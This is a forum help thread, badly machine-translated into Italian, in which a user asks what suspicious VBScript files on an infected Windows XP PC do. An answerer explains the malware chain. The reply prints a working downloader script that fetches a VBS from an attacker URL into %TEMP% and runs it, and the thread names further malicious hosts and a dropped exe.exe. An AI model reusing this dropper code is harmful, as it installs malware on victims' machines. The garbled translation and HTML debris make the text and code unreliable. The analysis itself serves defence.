Questione : Potrebbe un esperto provare prego ad interpretare questo codice di VBS

Ciao l'amico del experts

A sta vedendo un certo comportamento insolito con il suo calcolatore del Windows Xp SP3 IE7 sopra le coppie passate dei giorni où sono profondamente sospettoso.  Ho osservato che esso che accade sopra un collegamento di VNC appena una finestra di periodo ridotto ago.

A CMD.EXE schiocca in su e la lima di waits.
A VBS si apre ovviamente in blocchetto per appunti di Notepad.
When è chiusa, la finestra closes.

I di CMD abbastanza sure che questo è uno scritto cattivo che tenta di fare funzionare la lima di VBS senza specificare il programma (CScript o WScript) per farlo funzionare e perché ho fissato l'azione di difetto per la maggior parte del tipo tipi “dello scritto„ di lima al “pubblico„ l'azione (blocchetto per appunti) piuttosto che quello “aperto„ (eseguire lo scritto), l'attività cattiva è probabilmente failing.

On la prima occasione che non ho testimoniato, la lima “yb.vbs„ è stata aperta in che blocchetto per appunti dal dispositivo di piegatura di %TEMP% dell'utente con il seguente soddisfare: class= " lineNumbers " >
1 del >

B= codeBody " yb.vbs " " del prettyprint " " del class= del id= " codeSnippet800241 del >


I ha caricato programmi oggetto sicuro “il nofollow "„ del rel=„ del _blank "„ del target= " di http://jyiop.com/kr/yb.vbs del href= di  s di http://jyiop.com/kr/yb.vb„ ed ha veduto che il soddisfare era “confuso crudamente„ invertire da alcuni dei parametri come indicato qui sotto: class= " lineNumbers " >
1 del >

w=3000 del id= " codeSnippet800242 " del >


I ha caricato programmi oggetto sicuro “il nofollow riferito "„ del rel=„ del _blank "„ del target= " di http://jyiop.com/kr/hy/_q.php del href= di  .php di http://jyiop.com/kr/hy/_q„ per rivelare questo codice: class= " lineNumbers " >
1 del >

il class= >

I di 
 salvo l'obiettivo come > salvo come la lima di *.htm dello stesso nome) e con il codice adeguato, di modo che può appena essere la risposta dell'assistente al mio tentativo di caricare programmi oggetto il file.

Assuming il Relative URL identifica:  rel= " nofollow " " del _blank " " del target= " di http://jyiop.com/kr/_yoyk.php del href= di  http://jyiop.com/kr/_yoyk. il php
then che risolve al rel= " nofollow " " del _blank " " del target= " di http://www.google.com del href= di  http://www.google.com 
I che prova questo sul mio proprio sistema con il rel= " nofollow " " del _blank " " del target= " di http://www.google.co.uk del href= di  http://www.google.co.uk  come il Home Page, in modo da io sa che non sta riorientando appena al mio 

On di Home Page. l'occasione successiva che abbia testimoniato sopra VNC che un ordine è stato pubblicato ovviamente allontanarsi la lima “uor.vbs„ dal dispositivo di piegatura di %TEMP% dell'utente in una finestra di ordine ed il taccuino ha schioccato in su contenendo lo scritto: class= " lineNumbers " >
1 del >

B= codeBody " uor.vbs " " del prettyprint " " del class= del id= " codeSnippet800244 del >
 bs di http://ypuii.com/k_/uor.v„ in un sistema di editazione testi ha rivelato lo stessi di prima, IE. strings.

Now, ho trovato che “GetSpecialFolder (2)„ si riferisce al dispositivo di piegatura di %TEMP% dell'utente e posso vedere che lo scritto sta caricando programmi oggetto la lima di VBS, generante in moto un VBScript concatenando le stringhe e le stringhe invertite, ma sono incerto di esattamente che cosa uno scritto come questo è facente o provante a do.

I non molto competente con VBS tranne un certo uso di base, in modo da i seguenti riferimenti sono un puzzle a me: 

maertS.BDODA = ADOBD.Stream

c.open OT, a, z: 
If di c.send () c.Status = x Then
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close

I può vedere semplicemente quanto il giorno che Windows Media Player sta uccidendo fuori se stia funzionando (che non era ai tempi materiali), ma mi domando perché uno scritto stava facendo l'altra edizione apparentemente significativa di this.

One è che ho scoperto “un URL recentemente scriv„ nel elenco a discesa della barra di indirizzo dello IE dell'utente: il rel= " nofollow "„ del _blank„„ del target= " di http://ypuii.com/k_/zcus/efmjcg.pdf del href= del 
 fmjcg.pdf
I di http://ypuii.com/k_/zcus/e non potrebbe trovare che la lima nascosta dovunque sul calcolatore e sulla lei dell'utente non può neppure ricordare quando avrebbe avuta ultimo ha aperto una lima del pdf in suo browser.  Ho conservato quella lima del pdf e, su controllo in un sistema di editazione testi, posso vedere un certo soddisfare del testo come certo genere di codice scritto secondo copione e di riferimento “al Javascript„.  Ciò che segue è inoltre chiaro in un sistema di editazione testi: 

/Author (yZ=ssA f V)
/gZ di MllZTgg (. s_JUNCVZa #8l=z 96yp2x di b LPD tv/-Xqrf4dY3M: ihwBQn E K7gATGe H di S5Rm K o 0&uFOcj%? 
/Title (qgMpr#AZMZH di I1W) di NG JGgG?)
/ModDate (D del 
/Creator (Kotefekjoesito) del 
/Keywords (Mokomeuapaualimajsi): 20100621095906) il 

Googling del 
/Producer (820d5Deawohigejoxamogoga) appena “il creatore Kotefekjoesito„„ nome “lo prende a questa pagina: rel= " nofollow "„ del _blank„„ del target= " di http://jsunpack.jeek.org/dec/go?report=c4cc162b45e937762035f286406a989f2adf2753 del href= del 
 ec/go di http://jsunpack.jeek.org/d? report=c4cc162b45e937762035f286406a989f2adf2753
where indica chiaramente che la lima è Malicious.

I può indovinare soltanto che il riferimento più iniziale nel VBScript “a ADOBD.Stream„ è un riferimento “a Adobe„ e ad un flusso in una lima con cattiveria messa del pdf.  Posso supporre soltanto che questo era o l'inizio dell'edizione, o che era una lima ha andato a prendere da uno scritto cattivo, ma non avrei pensato che abbia aggiunto il URL alla lista recentemente scriv del URL.  Quello sta imbarazzando in sé. il 

Probably non che una coincidenza è che il StrReverse googling ()  “di maertS.BDODA " inoltre lo prende “al luogo del  di http://jsunpack.jeek.org  " del nofollow "„ del rel=„ del _blank„ del target= " di http://jsunpack.jeek.org del href= di  " con questa pagina: rel= " nofollow "„ del _blank„„ del target= " di http://jsunpack.jeek.org/dec/go?report=5d7727607489f01840f34855c5664e662488962e del href= del 
 ec/go di http://jsunpack.jeek.org/d? report=5d7727607489f01840f34855c5664e662488962e
but non dice che che è malicious.

Could qualcuno vogliate lo raccomandano che cosa quello primo scritto è probabile fare (o tentare per fare) sul calcolatore dell'utente.  Vorrei sapere dove mi levo in piedi che, perché un'esplorazione completa di antivirus + di RootKit del sistema non ha dato risultati positivi e non posso vedere in anticipo alcuni riferimenti alle lime di VBS nel 

Bill
 di registry.

Thanks

  
  class= del 





  
 
  
  



Risposta : Potrebbe un esperto provare prego ad interpretare questo codice di VBS


  

 



 


Non sono disposto a andare fino ad aprire i Web site che avete accennato tuttavia, dagli scritti qui sopra qui sono che cosa vedo…

Lo scritto 1 sta generando una lima in bianco, i collegamenti ad un Web site ed ai trasferimenti dal sistema centrale verso i satelliti il contenuto della pagina ed i depositi esso nella lima in bianco.  Questa lima è conservata come “yb.vbs„ ed è supposta eseguire.
-------------------------------------------------------------------
B= " yb.vbs "
Con CreateObject (“MSXML2.XMLHTTP„)
      .open “OTTENGONO„, “http://jyiop.com/kr/yb.vbs„, falso
      .send ()
      Regolar A = CreateObject (“Scripting.FileSystemObject„)
      Regolar D = A.CreateTextFile (A.GetSpecialFolder (2) + “\„ + B)
      D.WriteLine .responseText
Estremità con
D.Close
CreateObject (“WScript.Shell„). Fare funzionare A.GetSpecialFolder (2) +„ \ “+ B
-------------------------------------------------------------------
Punto 2 ora che la lima dei vbs è stata generata e funzionamento, prova a visitare un altro Web page ma questo volta conserva il soddisfare di Web page in una lima chiamata “exe.exe„.  Questa nuova lima deve essere conservata nel dispositivo di piegatura del temp degli utenti.
Lo scritto allora fa funzionare la lima “exe.exe„.
Avete accennato, il taskkill arresta Windows Media Player - perché, che sa?!?!
Lo scritto allora cancella lo scritto del vb che punto 1 ha generato (lo scritto che attualmente sta funzionando).
Ci è una seconda attesa 3 allora che la lima “exe.exe„ è cancellata.

Questa parte;
[maertS.BDODA = ADOBD.Stream
c.open OT, a, z: c.send ()
Se c.Status = x allora
u=c.ResponseBody: d.Open: d.Type = y: d.Write u: d.SaveToFile b: d.Close]
è lo scritto che scriv per aprire una lima che effluirà nel Web page - niente fare con Adobe.  “c.Status„ - lo scritto sta aspettando il Web page per essere pronto ed adattato a caricare programmi oggetto. “u=c.ResponseBody„ prende il Web page e lo spinge in una variabile.  Il flusso è aperto ed il testo è caricato programmi oggetto nella variabile.  La lima è conservata e chiusa.  In questo scritto il Web page/lima è conservato nel dispositivo di piegatura del temp come “exe.exe„.

Il pericolo reale è che lima “di exe.exe„.  Una volta che è stato funzionato, non si sa che cosa è stato destinato per fare.

Quel calcolatore ancora è infettato con un virus.  Il programma “exe.exe„ potrebbe caricare programmi oggetto altri virus nei precedenti per impedire le esplorazioni del sistema.  Il fatto che potete vedere la finestra di ordine aperta e lo scritto è tentato per funzionare mi dice che ci è una certa lima cattiva ancora che indugia.

Può essere tempo di valutare che necessità di essere conservato da quella macchina ed iniziare di nuovo con una reinstallazione di Windows e delle applicazioni.  Suona drammatico ma vedendo poichè l'antivirus non sta rilevando nulla dalle specie io pensare che siate sul punto di nessun ritorno.  Ricordare quello finchè il codice cattivo è sopra là, c'è ne guidano; sia il bastone di memoria del USB, la macchina fotografica ecc., può potenzialmente contenere il virus/Trojan, se sia stato attaccato alla macchina.
 
                       








 

                            

                              

                                

                                  


                                    Altre soluzioni
                                     
                                  

                                

                              

                              

                                
                                
                              

                            

                          




                    


                  

                  

                  
                         


                        

                    
                      

                         
                        

                      

                    

                  

              

              


        

            

          


 
         		
      




            

              

                
              

              

                



 


                    

                        

                          programming4us
                          
                          programming4us